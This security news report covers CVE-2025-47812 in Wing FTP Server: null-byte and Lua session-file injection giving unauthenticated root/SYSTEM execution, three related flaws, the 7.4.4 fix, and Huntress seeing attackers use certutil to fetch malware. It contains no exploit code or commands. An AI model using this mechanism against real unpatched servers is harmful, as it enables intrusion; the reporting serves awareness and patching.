Hackers began exploiting a critical vulnerability in Wing FTP Server just one day after technical details about the issue were published.
The vulnerability has been assigned the identifier CVE-2025-47812 and has received the maximum score of 10 on the CVSS scale. It involves a combination of a null byte and Lua code injection, allowing an unauthenticated attacker to remotely execute code with the highest privileges (root/SYSTEM).
The details of this issue were published by cybersecurity specialist Julien Ahrens on June 30, 2025. The expert explained that the vulnerability is related to the insecure handling of null-terminated strings in C++ and improper input sanitization in Lua.
A researcher has demonstrated that a null byte in the username field allows bypassing authentication and injecting Lua code into session files. When such files are subsequently executed by the server, arbitrary code execution as root/SYSTEM can be achieved.
In addition to CVE-2025-47812, Arens described three more vulnerabilities in Wing FTP Server:
- CVE-2025-27889 — allows extraction of user passwords via a specially crafted URL if the user fills and submits the login form, due to the inclusion of the password in a JavaScript (location) variable;
- CVE-2025-47811 — Wing FTP Server runs by default with root/SYSTEM privileges, without sandboxing or privilege reduction, making RCE much more dangerous;
- CVE-2025-47813 — providing an excessively long UID cookie reveals file system paths.
All vulnerabilities affect Wing FTP Server 7.4.3 and earlier versions. The issues were fixed in version 7.4.4, released on May 14, 2025, with the exception of the CVE-2025-47811 issue, which was deemed insignificant.
Experts from Huntress have developed a PoC exploit for the critical bug CVE-2025-47812 and demonstrated in a video how hackers can use it in attacks.
On July 1st, just a day after the technical details of CVE-2025-47812 were published, specialists from Huntress discovered that at least one attacker had already exploited the vulnerability against a company client.
Attackers sent malicious login requests using usernames with null bytes and targeted loginok.html. These requests created malicious .lua session files, injecting malicious code onto the server. This code was designed to decode the payload and execute it via cmd.exe (using certutil), which resulted in the download and execution of malware.
According to Huntress, Wing FTP Server was attacked from five different IP addresses over a short period of time. This may indicate attempts at mass scanning and exploitation of the vulnerability by multiple hacking groups.
It is noted that the attacks were unsuccessful either because of the attackers’ lack of knowledge or because Microsoft Defender stopped them. However, researchers emphasize that CVE-2025-47812 is clearly under attack and recommend that users update to version 7.4.4 as soon as possible.
2025.04.29 — FBI Offers 10 million USD for information on Salt Typhoon members
The FBI offers up to 10 million USD for information about members of the Chinese hacker group Salt Typhoon and last year's attack that had…
Full article →
2025.04.08 — Website of Everest ransomware group hacked and defaced
Last weekend, the darknet website of the Everest ransomware group was hacked and went offline. The attackers replaced its content with a sarcastic message: "Don't do crime…
Full article →
2025.02.05 — Google patches Android zero-day vulnerability exploited by hackers
Google released the February set of patches for Android. In total, they fix 48 bugs, including a kernel zero-day vulnerability actively exploited by hackers. The zero-day's…
Full article →
2025.04.15 — Hackers exploit authentication bypass bug in OttoKit WordPress plugin
Hackers exploit an authentication bypass vulnerability in the OttoKit (formerly SureTriggers) WordPress plugin used by more than 100,000 websites. First attacks were recorded just…
Full article →
2025.01.30 — Hackers use vulnerabilities in SimpleHelp RMM to attack corporate networks
Experts believe that recently patched vulnerabilities in SimpleHelp Remote Monitoring and Management (RMM) were used by attackers to gain initial access to corporate networks. A number…
Full article →
2025.01.29 — Google to disable Sync in older Chrome versions
Google announced that in early 2025, Chrome Sync will be disabled in Chrome versions older than four years. Chrome Sync enables users to save and sync their…
Full article →
2025.02.01 — Critical RCE vulnerability fixed in Cacti
A critical vulnerability has been discovered in the open-source Cacti framework: it enables an authenticated attacker to remotely execute arbitrary code. Vulnerability's ID is CVE-2025-22604; its…
Full article →
2025.03.20 — 8,000 vulnerabilities identified in WordPress ecosystem in 2024
According to Patchstack, world's #1 WordPress vulnerability intelligence provider, 7,966 new vulnerabilities were identified in the WordPress ecosystem in 2024; most of these bugs affected plugins…
Full article →
2025.02.28 — Qualcomm extends support for Android devices to 8 years
Qualcomm Technologies announced its collaboration with Google with the purpose to provide extended support for OEM devices running on company's flagship chipsets. This partnership will…
Full article →
2025.02.17 — Dutch police seize 127 servers belonging to Zservers hosting provider
Following the introduction of international sanctions against Zservers, Russian 'bulletproof' hosting services provider, the Dutch National Police (Politie) shut down and seized 127 servers belonging to Zservers/XHost.…
Full article →